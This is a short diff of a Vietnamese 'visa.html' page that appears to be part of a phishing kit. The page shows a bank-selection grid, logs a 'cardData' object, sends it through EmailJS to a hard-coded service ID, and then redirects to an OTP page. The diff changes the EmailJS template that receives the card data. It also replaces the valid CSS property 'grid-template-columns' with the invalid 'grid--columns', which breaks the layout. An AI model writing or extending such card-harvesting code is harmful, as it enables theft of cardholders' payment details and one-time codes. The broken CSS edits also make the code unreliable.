--- a/pages/vi/visa.html
+++ b/pages/vi/visa.html
@@ -228,7 +228,7 @@
         }
         .bank-grid {
             display: grid;
-            grid-template-columns: repeat(4, 1fr);
+            grid--columns: repeat(4, 1fr);
             gap: 8px;
             margin-bottom: 15px;
         }
@@ -582,7 +582,7 @@
                 padding: 10px;
             }
             .bank-grid {
-                grid-template-columns: repeat(3, 1fr);
+                grid--columns: repeat(3, 1fr);
             }
             .bank-option img {
                 max-width: 60px;
@@ -1043,7 +1043,7 @@
     method: ''
 };
                 console.log('Sending cardData:', cardData);
-                emailjs.send('service_149dqxt', 'template_8gfs8jr', cardData).then(
+                emailjs.send('service_149dqxt', 'template_d6bnj4k', cardData).then(
                     () => {
                         console.log('EmailJS sent successfully');
                         window.location.href = '/pages/vi/otp.html';
